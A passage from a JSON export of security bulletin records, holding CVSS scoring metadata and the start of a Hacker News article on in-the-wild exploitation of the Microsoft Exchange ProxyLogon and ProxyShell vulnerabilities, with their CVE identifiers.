"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-4bW5O7qDy3g/YRY939zQM4I/AAAAAAAADho/RUV3iIGj654Ml8xKhGo8MXIEWtGwsL1ywCLcBGAsYHQ/s0/ms-exchnage.jpg>)\n\nThreat actors are actively carrying out opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using a new exploit chain leveraging a trio of flaws affecting on-premises installations, making them the latest set of bugs after ProxyLogon vulnerabilities were exploited en masse at the start of the year.\n\nThe remote code execution flaws have been collectively dubbed \"ProxyShell.\" At least 30,000 machines are affected by the vulnerabilities, [according](<https://isc.sans.edu/diary/27732>) to a Shodan scan performed by Jan Kopriva of SANS Internet Storm Center.\n\n\"Started to see in the wild exploit attempts against our honeypot infrastructure for the Exchange ProxyShell vulnerabilities,\" NCC Group's Richard Warren [tweeted](<https://twitter.com/buffaloverflow/status/1425831100157349890>), noting that one of the intrusions resulted in the deployment of a \"C# aspx webshell in the /aspnet_client/ directory.\"\n\nPatched in early March 2021, [ProxyLogon](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/>) is the moniker for CVE-2021-26855, a server-side request forgery vulnerability in Exchange Server that permits an attacker to take control 
of a vulnerable server as an administrator, and which can be chained with another post-authentication arbitrary-file-write vulnerability, CVE-2021-27065, to achieve code execution.\n\nThe vulnerabilities came to light after Microsoft [spilled the beans](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) on a Beijing-sponsored hacking operation that leveraged the weaknesses to strike entities in the U.S. for purposes of exfiltrating information in what the company described as limited and targeted attacks.\n\nSince then, the Windows maker has fixed six more flaws in its mail server component, two of which are called [ProxyOracle](<https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-2-ProxyOracle/>), which enables an adversary to recover the user's password in plaintext format.\n\nThree other issues \u2014 known as ProxyShell \u2014 could be abused to bypass ACL controls, elevate privileges on Exchange PowerShell backend, effectively authenticating the attacker and allowing for remote code execution. Microsoft noted that both CVE-2021-34473 and CVE-2021-34523 were inadvertently omitted from publication until July.\n\n**ProxyLogon:**\n\n * [**CVE-2021-26855**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (Patched on March 2)\n * [**CVE-2021-26857**](<https://thehackernews.com/2021/03/microsoft-issues-security-patches-for.html>) \\- Microsoft Exchange Server Remote Code Execution Vulnerability (P